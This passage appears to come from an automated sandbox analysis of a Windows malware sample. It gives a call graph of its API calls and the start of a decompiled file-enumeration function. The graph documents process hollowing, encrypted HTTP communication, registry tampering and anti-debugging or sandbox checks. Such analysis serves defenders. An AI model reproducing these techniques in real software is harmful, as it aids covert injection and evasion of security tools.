7c1828 VirtualFree 5205->5237 5206->5209 5210 7c5233 5209->5210 5231 7c4de0 5209->5231 5210->5197 5210->5205 5211 7c527a ResumeThread 5212 7c528a WaitForSingleObject 5211->5212 5213 7c52ac 5211->5213 5212->5213 5215 7c529c GetExitCodeProcess 5212->5215 5214 7c52ba CloseHandle CloseHandle 5213->5214 5214->5197 5215->5214 5216->5202 5238 7c13dc GetProcessHeap RtlAllocateHeap 5217->5238 5219 7c4f0d 5239 7c4e94 NtQueryInformationProcess 5219->5239 5222 7c4f25 ReadProcessMemory 5223 7c4f4e ReadProcessMemory 5222->5223 5230 7c4ffd 5222->5230 5225 7c4f7d 5223->5225 5223->5230 5227 7c4fa5 ReadProcessMemory 5225->5227 5225->5230 5226 7c5019 5226->5204 5228 7c4fcc 5227->5228 5227->5230 5229 7c4fd8 ReadProcessMemory 5228->5229 5228->5230 5229->5230 5243 7c1440 GetProcessHeap HeapFree 5230->5243 5244 7c1258 5231->5244 5233 7c4dfb NtQueryInformationProcess 5234 7c4e18 5233->5234 5235 7c4e8d 5233->5235 5234->5235 5236 7c4e1e ReadProcessMemory ReadProcessMemory ReadProcessMemory 5234->5236 5235->5210 5236->5235 5237->5211 5238->5219 5240 7c4ebc 5239->5240 5241 7c4ee9 5239->5241 5240->5241 5242 7c4ec2 ReadProcessMemory 5240->5242 5241->5222 5241->5230 5242->5241 5243->5226 5244->5233 5245 7c5466 5246 7c5468 GetSystemTime 5245->5246 5247 7c5480 5246->5247 5447 7c70e5 5448 7c7118 5447->5448 5449 7c3f38 2 API calls 5448->5449 5450 7c7130 RegOpenKeyExA 5449->5450 5465 7c1440 GetProcessHeap HeapFree 5450->5465 5452 7c7155 5453 7c3f38 2 API calls 5452->5453 5454 7c7166 5453->5454 5466 7c38b0 RegQueryValueExA 5454->5466 5456 7c7185 5457 7c71bb 5456->5457 5459 7c3f38 2 API calls 5456->5459 5468 7c1440 GetProcessHeap HeapFree 5457->5468 5461 7c7196 5459->5461 5460 7c71c3 5469 7c3890 RegCloseKey 5460->5469 5467 7c1440 GetProcessHeap HeapFree 5461->5467 5463 7c71cb 5465->5452 5466->5456 5467->5457 5468->5460 5469->5463 5470 7c9468 5471 7c9479 CreateThread RtlExitUserThread 5470->5471 5473 7c90b8 5470->5473 5488 7c9124 5471->5488 5479 7c252c 5473->5479 5476 7c90fb 5477 7c2574 17 API calls 5476->5477 5478 7c911e 5477->5478 5478->5471 5480 7c24f8 GetPEB 5479->5480 5481 7c2535 5480->5481 5482 7c1994 2 API calls 5481->5482 5483 7c2545 5482->5483 5484 7c1994 2 API calls 5483->5484 5485 7c2557 5484->5485 5486 7c1994 2 API calls 5485->5486 5487 7c2569 VirtualProtect 5486->5487 5487->5476 5489 7c69bc 12 API calls 5488->5489 5490 7c9135 5489->5490 5491 7c3e98 5492 7c3ed5 RegCreateKeyExA 5491->5492 5493 7c3eaf RegCreateKeyExA 5491->5493 5494 7c3ef9 5492->5494 5493->5494 5499 7c38b0 RegQueryValueExA 5494->5499 5496 7c3f16 5500 7c3890 RegCloseKey 5496->5500 5498 7c3f2f 5499->5496 5500->5498 5501 7c7c4e 5502 7c7c50 CreateFileA 5501->5502 5503 7c7c80 CreateFileA 5502->5503 5504 7c7c9c 5502->5504 5503->5504 5505 7c7ca2 ReadFile SetFilePointer ReadFile CloseHandle 5504->5505 5506 7c7cf3 5504->5506 5505->5506 5248 7c17a2 5249 7c17a4 5248->5249 5250 7c17de 5249->5250 5251 7c17bd CryptDecrypt 5249->5251 5251->5250 3596 7c8a48 3597 7c8a5d PostQuitMessage 3596->3597 3598 7c8a56 3596->3598 3601 7c8a79 3597->3601 3599 7c8a6c 3598->3599 3600 7c8a5b NtdllDefWindowProc_A 3598->3600 3604 7c78fc 3599->3604 3600->3601 3615 7c38dc RtlEnterCriticalSection 3604->3615 3606 7c7944 3644 7c38ec RtlLeaveCriticalSection 3606->3644 3607 7c790f 3607->3606 3609 7c7946 3607->3609 3610 7c793c 3607->3610 3612 7c7962 SHDeleteKeyA 3609->3612 3613 7c794f SHDeleteKeyA 3609->3613 3616 7c76a0 3610->3616 3611 7c797d 3611->3601 3612->3606 3613->3606 3615->3607 3617 7c77ba 3616->3617 3618 7c76b9 3616->3618 3617->3606 3618->3617 3645 7c3fc8 CoInitialize 3618->3645 3620 7c7893 3622 7c4968 4 API calls 3620->3622 3621 7c7776 3651 7c4968 3621->3651 3627 7c78a3 3622->3627 3624 7c7786 3624->3617 3626 7c779a 3624->3626 3634 7c77bf 3624->3634 3625 7c7712 3625->3620 3625->3621 3660 7c485c CreateFileA 3626->3660 3627->3617 3630 7c485c 4 API calls 3627->3630 3631 7c78d5 3630->3631 3633 7c763c 39 API calls 3631->3633 3633->3617 3673 7c3b80 3634->3673 3636 7c781d 3676 7c1440 GetProcessHeap HeapFree 3636->3676 3638 7c7838 3639 7c7846 MoveFileExA 3638->3639 3639->3617 3640 7c7866 3639->3640 3640->3617 3641 7c485c 4 API calls 3640->3641 3642 7c7886 3641->3642 3643 7c763c 39 API calls 3642->3643 3643->3617 3644->3611 3646 7c400f 3645->3646 3647 7c4072 MultiByteToWideChar MultiByteToWideChar 3646->3647 3648 7c40dd 3646->3648 3649 7c40c9 3647->3649 3648->3625 3677 7c3988 FindFirstFileA FindClose 3649->3677 3652 7c498a SHGetValueA 3651->3652 3678 7c48dc 3651->3678 3654 7c49bb RegOpenKeyExA 3652->3654 3655 7c4a12 3652->3655 3654->3655 3656 7c49da 3654->3656 3655->3624 3680 7c3930 RegSetValueExA 3656->3680 3658 7c49fb 3681 7c3890 RegCloseKey 3658->3681 3661 7c48d4 3660->3661 3662 7c4895 WriteFile 3660->3662 3665 7c763c CreateFileA 3661->3665 3663 7c48b1 3662->3663 3664 7c48c0 FlushFileBuffers CloseHandle 3662->3664 3663->3664 3664->3661 3666 7c7692 3665->3666 3667 7c7667 GetFileSize 3665->3667 3670 7c7240 36 API calls 3666->3670 3668 7c7686 CloseHandle 3667->3668 3669 7c767c 3667->3669 3672 7c769c 3668->3672 3682 7c7240 3669->3682 3670->3672 3672->3617 3938 7c13dc GetProcessHeap RtlAllocateHeap 3673->3938 3675 7c3b99 3675->3636 3676->3638 3677->3648 3679 7c48f9 3678->3679 3679->3652 3680->3658 3681->3655 3683 7c7259 3682->3683 3688 7c71d4 3683->3688 3686 7c7271 3686->3668 3689 7c71f1 3688->3689 3693 7c7231 3688->3693 3695 7c64bc 3689->3695 3691 7c71fc 3708 7c5d20 3691->3708 3693->3686 3694 7c1440 GetProcessHeap HeapFree 3693->3694 3694->3686 3696 7c64d8 3695->3696 3697 7c651f GetVersionExA 3696->3697 3811 7c1864 wsprintfA 3697->3811 3699 7c6549 3812 7c1864 wsprintfA 3699->3812 3701 7c6572 3813 7c1864 wsprintfA 3701->3813 3703 7c6593 3814 7c3ea0 3703->3814 3707 7c65f2 3707->3691 3709 7c6332 3708->3709 3710 7c5d38 3708->3710 3709->3693 3710->3709 3826 7c54b8 3710->3826 3715 7c5858 3 API calls 3716 7c5dfe 3715->3716 3839 7c17e8 3716->3839 3726 7c5eaf 3854 7c3864 InternetOpenA 3726->3854 3728 7c5ed6 3855 7c170c InternetSetOptionA 3728->3855 3730 7c5ef2 3856 7c170c InternetSetOptionA 3730->3856 3732 7c5f0b 3857 7c170c InternetSetOptionA 3732->3857 3734 7c5f24 3858 7c170c InternetSetOptionA 3734->3858 3736 7c5f36 3859 7c170c InternetSetOptionA 3736->3859 3738 7c5f4f 3739 7c5f76 3738->3739 3860 7c170c InternetSetOptionA 3738->3860 3861 7c161c InternetConnectA 3739->3861 3742 7c5fa8 3862 7c1660 HttpOpenRequestA 3742->3862 3744 7c6050 3746 7c6056 3744->3746 3747 7c60b0 3744->3747 3745 7c6013 3745->3744 3863 7c16d8 InternetQueryOptionA 3745->3863 3865 7c5894 3746->3865 3884 7c13dc GetProcessHeap RtlAllocateHeap 3747->3884 3750 7c6037 3864 7c170c InternetSetOptionA 3750->3864 3755 7c607a 3759 7c5894 6 API calls 3755->3759 3756 7c60ae 3885 7c15e4 HttpSendRequestA 3756->3885 3758 7c60f6 3760 7c60fa 3758->3760 3761 7c6107 3758->3761 3759->3756 3886 7c1440 GetProcessHeap HeapFree 3760->3886 3887 7c1440 GetProcessHeap HeapFree 3761->3887 3764 7c610f 3888 7c39cc HttpQueryInfoA 3764->3888 3767 7c6138 3808 7c6102 3767->3808 3889 7c13dc GetProcessHeap RtlAllocateHeap 3767->3889 3768 7c6322 3925 7c151c InternetCloseHandle 3768->3925 3771 7c632a 3926 7c151c InternetCloseHandle 3771->3926 3774 7c61c5 3777 7c61d8 3774->3777 3778 7c61cb 3774->3778 3775 7c614f 3775->3774 3776 7c6197 3775->3776 3775->3808 3890 7c16a4 InternetQueryDataAvailable 3775->3890 3776->3775 3891 7c1460 GetProcessHeap RtlReAllocateHeap 3776->3891 3892 7c15b0 InternetReadFile 3776->3892 3894 7c13dc GetProcessHeap RtlAllocateHeap 3777->3894 3893 7c1440 GetProcessHeap HeapFree 3778->3893 3782 7c61e1 3895 7c59bc 3782->3895 3786 7c17e8 CryptAcquireContextA 3787 7c6222 3786->3787 3909 7c1374 3787->3909 3792 7c1404 CryptHashData 3793 7c6261 3792->3793 3794 7c1404 CryptHashData 3793->3794 3795 7c627e 3794->3795 3796 7c1404 CryptHashData 3795->3796 3797 7c6292 3796->3797 3915 7c1490 3797->3915 3802 7c1b20 CryptReleaseContext 3803 7c62c4 3802->3803 3804 7c62db 3803->3804 3805 7c62fd 3803->3805 3921 7c1440 GetProcessHeap HeapFree 3804->3921 3923 7c1440 GetProcessHeap HeapFree 3805->3923 3924 7c151c InternetCloseHandle 3808->3924 3809 7c62e3 3922 7c1440 GetProcessHeap HeapFree 3809->3922 3811->3699 3812->3701 3813->3703 3815 7c3ed5 RegCreateKeyExA 3814->3815 3816 7c3eaf RegCreateKeyExA 3814->3816 3817 7c3ef9 3815->3817 3816->3817 3824 7c38b0 RegQueryValueExA 3817->3824 3819 7c3f16 3825 7c3890 RegCloseKey 3819->3825 3821 7c3f2f 3822 7c5468 GetSystemTime 3821->3822 3823 7c5480 3822->3823 3823->3707 3824->3819 3825->3821 3829 7c54cb 3826->3829 3827 7c560f 3832 7c5858 3827->3832 3830 7c5567 3829->3830 3927 7c1844 wsprintfA 3829->3927 3830->3827 3928 7c1844 wsprintfA 3830->3928 3833 7c17e8 CryptAcquireContextA 3832->3833 3834 7c5877 3833->3834 3929 7c153c 3834->3929 3837 7c1b20 CryptReleaseContext 3838 7c588f 3837->3838 3838->3715 3840 7c1801 CryptAcquireContextA 3839->3840 3841 7c181e 3839->3841 3840->3841 3842 7c18a0 3841->3842 3843 7c18da 3842->3843 3844 7c18b9 CryptImportKey 3842->3844 3845 7c1ab0 3843->3845 3844->3843 3846 7c1aee 3845->3846 3847 7c1ac9 CryptEncrypt 3845->3847 3848 7c1af8 3846->3848 3847->3846 3849 7c1b0b CryptDestroyKey 3848->3849 3850 7c1b18 3848->3850 3849->3850 3851 7c1b20 3850->3851 3852 7c1b47 3851->3852 3853 7c1b36 CryptReleaseContext 3851->3853 3852->3726 3853->3852 3854->3728 3855->3730 3856->3732 3857->3734 3858->3736 3859->3738 3860->3739 3861->3742 3862->3745 3863->3750 3864->3744 3866 7c17e8 CryptAcquireContextA 3865->3866 3867 7c58bb 3866->3867 3868 7c18a0 CryptImportKey 3867->3868 3869 7c5904 3868->3869 3932 7c1574 3869->3932 3872 7c1574 CryptSetKeyParam 3873 7c5936 3872->3873 3874 7c5945 3873->3874 3876 7c5960 3873->3876 3875 7c1ab0 CryptEncrypt 3874->3875 3877 7c595e 3875->3877 3878 7c1ab0 CryptEncrypt 3876->3878 3879 7c1af8 CryptDestroyKey 3877->3879 3878->3877 3880 7c59a9 3879->3880 3881 7c1b20 CryptReleaseContext 3880->3881 3882 7c59b3 3881->3882 3883 7c13dc GetProcessHeap RtlAllocateHeap 3882->3883 3883->3755 3884->3756 3885->3758 3886->3808 3887->3764 3888->3767 3889->3775 3890->3775 3891->3776 3892->3776 3893->3808 3894->3782 3896 7c59e3 3895->3896 3897 7c59d6 3895->3897 3896->3897 3898 7c17e8 CryptAcquireContextA 3896->3898 3897->3786 3899 7c5a0f 3898->3899 3900 7c18a0 CryptImportKey 3899->3900 3901 7c5a58 3900->3901 3902 7c1574 CryptSetKeyParam 3901->3902 3903 7c5a71 3902->3903 3935 7c17a4 3903->3935 3905 7c5a9c 3906 7c1af8 CryptDestroyKey 3905->3906 3907 7c5ad2 3906->3907 3908 7c1b20 CryptReleaseContext 3907->3908 3908->3897 3910 7c13aa 3909->3910 3911 7c138d CryptCreateHash 3909->3911 3912 7c1404 3910->3912 3911->3910 3913 7c141d CryptHashData 3912->3913 3914 7c1436 3912->3914 3913->3914 3914->3792 3916 7c14c6 3915->3916 3917 7c14a9 CryptGetHashParam 3915->3917 3918 7c14d0 3916->3918 3917->3916 3919 7c14e3 CryptDestroyHash 3918->3919 3920 7c14f0 3918->3920 3919->3920 3920->3802 3921->3809 3922->3808 3923->3808 3924->3768 3925->3771 3926->3709 3927->3829 3928->3830 3930 7c156a 3929->3930 3931 7c1555 CryptGenRandom 3929->3931 3930->3837 3931->3930 3933 7c15a6 3932->3933 3934 7c158d CryptSetKeyParam 3932->3934 3933->3872 3934->3933 3936 7c17de 3935->3936 3937 7c17bd CryptDecrypt 3935->3937 3936->3905 3937->3936 3938->3675 5507 7c5d1c 5508 7c6332 5507->5508 5509 7c5d38 5507->5509 5509->5508 5510 7c54b8 wsprintfA 5509->5510 5511 7c5dde 5510->5511 5512 7c5858 3 API calls 5511->5512 5513 7c5dee 5512->5513 5514 7c5858 3 API calls 5513->5514 5515 7c5dfe 5514->5515 5516 7c17e8 CryptAcquireContextA 5515->5516 5517 7c5e5f 5516->5517 5518 7c18a0 CryptImportKey 5517->5518 5519 7c5e77 5518->5519 5520 7c1ab0 CryptEncrypt 5519->5520 5521 7c5e9d 5520->5521 5522 7c1af8 CryptDestroyKey 5521->5522 5523 7c5ea5 5522->5523 5524 7c1b20 CryptReleaseContext 5523->5524 5525 7c5eaf 5524->5525 5611 7c3864 InternetOpenA 5525->5611 5527 7c5ed6 5612 7c170c InternetSetOptionA 5527->5612 5529 7c5ef2 5613 7c170c InternetSetOptionA 5529->5613 5531 7c5f0b 5614 7c170c InternetSetOptionA 5531->5614 5533 7c5f24 5615 7c170c InternetSetOptionA 5533->5615 5535 7c5f36 5616 7c170c InternetSetOptionA 5535->5616 5537 7c5f4f 5539 7c5f76 5537->5539 5617 7c170c InternetSetOptionA 5537->5617 5609 7c161c InternetConnectA 5539->5609 5541 7c5fa8 5618 7c1660 HttpOpenRequestA 5541->5618 5543 7c6050 5545 7c6056 5543->5545 5546 7c60b0 5543->5546 5544 7c6013 5544->5543 5619 7c16d8 InternetQueryOptionA 5544->5619 5548 7c5894 6 API calls 5545->5548 5622 7c13dc GetProcessHeap RtlAllocateHeap 5546->5622 5551 7c606d 5548->5551 5549 7c6037 5620 7c170c InternetSetOptionA 5549->5620 5621 7c13dc GetProcessHeap RtlAllocateHeap 5551->5621 5553 7c60ae 5610 7c15e4 HttpSendRequestA 5553->5610 5555 7c607a 5558 7c5894 6 API calls 5555->5558 5557 7c60f6 5559 7c60fa 5557->5559 5560 7c6107 5557->5560 5558->5553 5623 7c1440 GetProcessHeap HeapFree 5559->5623 5624 7c1440 GetProcessHeap HeapFree 5560->5624 5563 7c610f 5625 7c39cc HttpQueryInfoA 5563->5625 5566 7c6138 5581 7c6102 5566->5581 5626 7c13dc GetProcessHeap RtlAllocateHeap 5566->5626 5567 7c6322 5636 7c151c InternetCloseHandle 5567->5636 5570 7c632a 5637 7c151c InternetCloseHandle 5570->5637 5573 7c61c5 5575 7c61d8 5573->5575 5576 7c61cb 5573->5576 5574 7c614f 5574->5573 5574->5581 5627 7c16a4 InternetQueryDataAvailable 5574->5627 5628 7c1460 GetProcessHeap RtlReAllocateHeap 5574->5628 5629 7c15b0 InternetReadFile 5574->5629 5631 7c13dc GetProcessHeap RtlAllocateHeap 5575->5631 5630 7c1440 GetProcessHeap HeapFree 5576->5630 5580 7c61e1 5582 7c59bc 6 API calls 5580->5582 5635 7c151c InternetCloseHandle 5581->5635 5584 7c620f 5582->5584 5585 7c17e8 CryptAcquireContextA 5584->5585 5586 7c6222 5585->5586 5587 7c1374 CryptCreateHash 5586->5587 5588 7c6237 5587->5588 5589 7c1404 CryptHashData 5588->5589 5590 7c624c 5589->5590 5591 7c1404 CryptHashData 5590->5591 5592 7c6261 5591->5592 5593 7c1404 CryptHashData 5592->5593 5594 7c627e 5593->5594 5595 7c1404 CryptHashData 5594->5595 5596 7c6292 5595->5596 5597 7c1490 CryptGetHashParam 5596->5597 5598 7c62b2 5597->5598 5599 7c14d0 CryptDestroyHash 5598->5599 5600 7c62ba 5599->5600 5601 7c1b20 CryptReleaseContext 5600->5601 5602 7c62c4 5601->5602 5603 7c62db 5602->5603 5604 7c62fd 5602->5604 5632 7c1440 GetProcessHeap HeapFree 5603->5632 5634 7c1440 GetProcessHeap HeapFree 5604->5634 5607 7c62e3 5633 7c1440 GetProcessHeap HeapFree 5607->5633 5609->5541 5610->5557 5611->5527 5612->5529 5613->5531 5614->5533 5615->5535 5616->5537 5617->5539 5618->5544 5619->5549 5620->5543 5621->5555 5622->5553 5623->5581 5624->5563 5625->5566 5626->5574 5627->5574 5628->5574 5629->5574 5630->5581 5631->5580 5632->5607 5633->5581 5634->5581 5635->5567 5636->5570 5637->5508 5252 7c8a44 5253 7c8a5d PostQuitMessage 5252->5253 5254 7c8a56 5252->5254 5259 7c8a79 5253->5259 5255 7c8a6c 5254->5255 5256 7c8a5b NtdllDefWindowProc_A 5254->5256 5258 7c78fc 56 API calls 5255->5258 5256->5259 5258->5259 5638 7c584c 5639 7c5858 5638->5639 5640 7c17e8 CryptAcquireContextA 5639->5640 5641 7c5877 5640->5641 5642 7c153c CryptGenRandom 5641->5642 5643 7c5885 5642->5643 5644 7c1b20 CryptReleaseContext 5643->5644 5645 7c588f 5644->5645 5646 7c9147 5647 7c9149 5646->5647 5648 7c69bc 12 API calls 5647->5648 5649 7c9166 5648->5649 5260 7c6ece 5261 7c6ed3 5260->5261 5273 7c6f1c 5260->5273 5264 7c6ed5 5261->5264 5266 7c6ea4 5261->5266 5262 7c1994 2 API calls 5263 7c6f33 5262->5263 5265 7c1994 2 API calls 5263->5265 5267 7c3f38 2 API calls 5264->5267 5268 7c6f45 5265->5268 5288 7c1440 GetProcessHeap HeapFree 5266->5288 5269 7c6f04 LoadLibraryA 5267->5269 5270 7c1994 2 API calls 5268->5270 5289 7c1440 GetProcessHeap HeapFree 5269->5289 5275 7c6f57 5270->5275 5273->5262 5276 7c70c7 5273->5276 5274 7c6ec7 5277 7c1994 2 API calls 5275->5277 5278 7c6f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 5277->5278 5279 7c12dc 5278->5279 5280 7c6fdf CharLowerBuffA SetupDiDestroyDeviceInfoList 5279->5280 5281 7c3f38 2 API calls 5280->5281 5282 7c7001 5281->5282 5283 7c701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 5282->5283 5284 7c12dc 5283->5284 5285 7c708e CharLowerBuffA SetupDiDestroyDeviceInfoList 5284->5285 5286 7c70b4 5285->5286 5290 7c1440 GetProcessHeap HeapFree 5286->5290 5288->5274 5289->5273 5290->5276 5291 7c8977 5294 7c1440 GetProcessHeap HeapFree 5291->5294 5293 7c897f 5294->5293 5295 7c6cf0 5296 7c6cfc 5295->5296 5297 7c3f38 2 API calls 5296->5297 5298 7c6d0c 5297->5298 5301 7c1440 GetProcessHeap HeapFree 5298->5301 5300 7c6d36 5301->5300 5650 7c4960 5651 7c48dc 5650->5651 5652 7c498a SHGetValueA 5651->5652 5653 7c49bb RegOpenKeyExA 5652->5653 5654 7c4a12 5652->5654 5653->5654 5655 7c49da 5653->5655 5659 7c3930 RegSetValueExA 5655->5659 5657 7c49fb 5660 7c3890 RegCloseKey 5657->5660 5659->5657 5660->5654 5324 7c6cfc 5325 7c3f38 2 API calls 5324->5325 5326 7c6d0c 5325->5326 5329 7c1440 GetProcessHeap HeapFree 5326->5329 5328 7c6d36 5329->5328 5302 7c7118 5303 7c3f38 2 API calls 5302->5303 5304 7c7130 RegOpenKeyExA 5303->5304 5319 7c1440 GetProcessHeap HeapFree 5304->5319 5306 7c7155 5307 7c3f38 2 API calls 5306->5307 5308 7c7166 5307->5308 5320 7c38b0 RegQueryValueExA 5308->5320 5310 7c7185 5311 7c71bb 5310->5311 5313 7c3f38 2 API calls 5310->5313 5322 7c1440 GetProcessHeap HeapFree 5311->5322 5315 7c7196 5313->5315 5314 7c71c3 5323 7c3890 RegCloseKey 5314->5323 5321 7c1440 GetProcessHeap HeapFree 5315->5321 5317 7c71cb 5319->5306 5320->5310 5321->5311 5322->5314 5323->5317 5330 7c7982 5331 7c7984 GetVolumeInformationA 5330->5331 5661 7c6d64 5662 7c3f38 2 API calls 5661->5662 5663 7c6d79 GetModuleHandleA 5662->5663 5666 7c1440 GetProcessHeap HeapFree 5663->5666 5665 7c6d9a 5666->5665 5667 7c1402 5668 7c1404 5667->5668 5669 7c141d CryptHashData 5668->5669 5670 7c1436 5668->5670 5669->5670 5671 7c89d2 5672 7c89d4 GetVolumeInformationA 5671->5672 5673 7c8a0c 5672->5673 5332 7c82f4 5333 7c82f8 5332->5333 5334 7c8481 5333->5334 5335 7c833e 5333->5335 5346 7c8416 5334->5346 5355 7c7290 CreateThread CloseHandle 5334->5355 5337 7c8358 GetTempPathA 5335->5337 5335->5346 5338 7c7560 4 API calls 5337->5338 5339 7c8375 5338->5339 5340 7c83cd 5339->5340 5341 7c842b 5339->5341 5343 7c485c 4 API calls 5340->5343 5353 7c1828 VirtualFree 5341->5353 5344 7c83de Sleep CreateProcessA 5343->5344 5344->5346 5347 7c841f 5344->5347 5345 7c843c 5354 7c13b4 VirtualAlloc 5345->5354 5352 7c7290 CreateThread CloseHandle 5347->5352 5349 7c8449 5351 7c8459 wsprintfA 5349->5351 5351->5346 5352->5346 5353->5345 5354->5349 5355->5346 5356 7c1860 wsprintfA 5674 7c41c8 5675 7c41cc GetCurrentThread OpenThreadToken 5674->5675 5676 7c4217 5675->5676 5677 7c41f4 GetLastError 5675->5677 5678 7c42cc 5676->5678 5689 7c13dc GetProcessHeap RtlAllocateHeap 5676->5689 5677->5676 5679 7c4201 GetCurrentProcess OpenProcessToken 5677->5679 5679->5676 5681 7c422b GetTokenInformation CloseHandle 5682 7c425a AllocateAndInitializeSid 5681->5682 5683 7c42c4 5681->5683 5684 7c42ba FreeSid 5682->5684 5685 7c4288 5682->5685 5690 7c1440 GetProcessHeap HeapFree 5683->5690 5684->5683 5685->5684 5687 7c4293 EqualSid 5685->5687 5687->5685 5688 7c42ac 5687->5688 5688->5684 5689->5681 5690->5678 5040 7c5614 5041 7c5635 5040->5041 5043 7c14f8 InternetGetConnectedState 5040->5043 5043->5041 5691 7c6d55 5692 7c6d64 5691->5692 5693 7c3f38 2 API calls 5692->5693 5694 7c6d79 GetModuleHandleA 5693->5694 5697 7c1440 GetProcessHeap HeapFree 5694->5697 5696 7c6d9a 5697->5696 5698 7c9347 5699 7c9349 GetCurrentProcess 5698->5699 5701 7c453c 2 API calls 5699->5701 5702 7c9364 5701->5702 5703 7c9391 GetWindowsDirectoryA 5702->5703 5704 7c9368 GetWindowsDirectoryA 5702->5704 5705 7c938c 5703->5705 5704->5705 5715 7c5028 5705->5715 5708 7c9459 ExitProcess 5709 7c93f9 SHGetSpecialFolderPathA 5710 7c133c 5709->5710 5711 7c941e PathFileExistsA 5710->5711 5711->5708 5712 7c9432 5711->5712 5713 7c5028 28 API calls 5712->5713 5714 7c9453 5713->5714 5714->5708 5716 7c503e GetModuleHandleA 5715->5716 5718 7c5049 5715->5718 5716->5718 5717 7c506e CreateProcessA 5719 7c52ce 5717->5719 5720 7c50a3 5717->5720 5718->5717 5719->5708 5719->5709 5721 7c50c4 CreateFileMappingA MapViewOfFile 5720->5721 5722 7c5124 5721->5722 5738 7c13b4 VirtualAlloc 5722->5738 5724 7c5169 5725 7c4ef0 10 API calls 5724->5725 5726 7c51db 5725->5726 5727 7c5213 5726->5727 5730 7c51f4 GetThreadContext 5726->5730 5728 7c5233 5727->5728 5731 7c4de0 4 API calls 5727->5731 5728->5719 5729 7c5240 VirtualProtectEx WriteProcessMemory 5728->5729 5739 7c1828 VirtualFree 5729->5739 5730->5727 5731->5728 5733 7c527a ResumeThread 5734 7c528a WaitForSingleObject 5733->5734 5735 7c52ac 5733->5735 5734->5735 5737 7c529c GetExitCodeProcess 5734->5737 5736 7c52ba CloseHandle CloseHandle 5735->5736 5736->5719 5737->5736 5738->5724 5739->5733 5044 7c8bf8 RegOpenKeyExA 5048 7c8c4b 5044->5048 5051 7c38b0 RegQueryValueExA 5044->5051 5047 7c8c97 5053 7c3890 RegCloseKey 5047->5053 5052 7c38b0 RegQueryValueExA 5048->5052 5050 7c8ca2 5051->5048 5052->5047 5053->5050 5747 7c6900 GetComputerNameA 5748 7c694f RegOpenKeyExA 5747->5748 5752 7c6931 5747->5752 5754 7c38b0 RegQueryValueExA 5748->5754 5750 7c6992 5755 7c3890 RegCloseKey 5750->5755 5752->5748 5753 7c699d 5754->5750 5755->5753 5740 7c9178 5742 7c917a 5740->5742 5746 7c3b6c GetCommandLineA 5742->5746 5743 7c918f 5744 7c69bc 12 API calls 5743->5744 5745 7c919a 5744->5745 5746->5743 5756 7c9530 5757 7c9540 5756->5757 5760 7c9470 5757->5760 5759 7c9545 5761 7c90b8 18 API calls 5760->5761 5762 7c9479 CreateThread RtlExitUserThread 5761->5762 5762->5759 5763 7c9124 12 API calls 5762->5763 5357 7c92cd 5358 7c92cf GetModuleFileNameA 5357->5358 5364 7c7c50 CreateFileA 5358->5364 5362 7c69bc 12 API calls 5363 7c9335 5362->5363 5365 7c7c80 CreateFileA 5364->5365 5366 7c7c9c 5364->5366 5365->5366 5367 7c7ca2 ReadFile SetFilePointer ReadFile CloseHandle 5366->5367 5368 7c7cf3 wsprintfA GetCursorPos 5366->5368 5367->5368 5368->5362 5369 7c91fa 5370 7c91fc 5369->5370 5375 7c4a68 GetComputerNameA 5370->5375 5372 7c9216 5373 7c69bc 12 API calls 5372->5373 5374 7c921e 5373->5374 5376 7c4a95 5375->5376 5377 7c4aa3 RegOpenKeyExA 5375->5377 5376->5377 5393 7c38b0 RegQueryValueExA 5377->5393 5379 7c4ae6 5394 7c3890 RegCloseKey 5379->5394 5381 7c4af1 5382 7c44f0 GetVersionExA 5381->5382 5383 7c4b12 GetCurrentProcess 5382->5383 5384 7c42d4 11 API calls 5383->5384 5385 7c4b22 5384->5385 5386 7c44f0 GetVersionExA 5385->5386 5387 7c4b2c 5386->5387 5388 7c4b41 GetCurrentProcess 5387->5388 5389 7c4b31 5387->5389 5390 7c42d4 11 API calls 5388->5390 5391 7c41cc 14 API calls 5389->5391 5392 7c4b36 5390->5392 5391->5392 5392->5372 5393->5379 5394->5381 5764 7c6d40 IsDebuggerPresent 5395 7c6dc8 GetTickCount 5396 7c6dd1 Sleep GetTickCount 5395->5396 5398 7c4406 5399 7c4408 InitializeSecurityDescriptor 5398->5399 5400 7c442d SetSecurityDescriptorDacl 5399->5400 5405 7c44bb 5399->5405 5401 7c4445 ConvertStringSecurityDescriptorToSecurityDescriptorA 5400->5401 5400->5405 5402 7c4463 GetSecurityDescriptorSacl 5401->5402 5401->5405 5403 7c4488 SetSecurityDescriptorSacl 5402->5403 5404 7c44a8 LocalFree 5402->5404 5403->5404 5403->5405 5404->5405

    Executed Functions

    Function 007C5640, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137

    Control-flow Graph

    C-Code - Quality: 92%
    			E007C5640(char* __eax, void* __ecx, void* __edx) {
				char* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				struct _WIN32_FIND_DATAA _v352;
				char _v609;
				char _v866;
				intOrPtr _t68;
				void* _t73;
				int _t81;
				intOrPtr _t89;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t133;
				void* _t134;
				void* _t135;

				_v8 = __eax;
				_v12 = 0;
				 *_v8 = 0;
				 *0x7cb21c(0,  &_v609, 0x1a, 0xffffffff);
				_t68 =  *0x7ca188; // 0x7c1e60
				E007C133C( &_v609, _t68);
				_t135 = _t134 + 8;
				_v352.dwFileAttributes = 0x80;
				_t73 = FindFirstFileA( &_v609,  &_v352); // executed
				_v16 = _t73;
				 *((char*)(_t133 + E007C12DC( &_v609) - 0x25e)) = 0;
				if(_v16 == 0xffffffff) {
					L12:
					FindClose(_v16);
					return _v12;
				} else {
					goto L1;
				}
				do {
					L1:
					if(_v352.cFileName == 0x2e) {
						goto L11;
					}
					E007C1308( &_v866,  &_v609);
					E007C133C( &_v866,  &(_v352.cFileName));
					_t89 =  *0x7ca178; // 0x7c1e20
					E007C133C( &_v866, _t89);
					_t135 = _t135 + 0x10;
					_t93 = E007C3988( &_v866); // executed
					if(_t93 == 0) {
						goto L11;
					}
					_t95 = E007C47AC( &_v866,  &_v20); // executed
					_v24 = _t95;
					if(_v24 <= 0) {
						goto L11;
					}
					 *((char*)(_v20 + _v24)) = 0;
					_t127 =  *0x7ca17c; // 0x7c1e2c
					_v28 = E007C1110(_v20, _t127);
					if(_v28 == 0) {
						E007C1828(_v20); // executed
						goto L11;
					}
					_v28 = _v28 + 0xd;
					if( *_v28 == 0x31) {
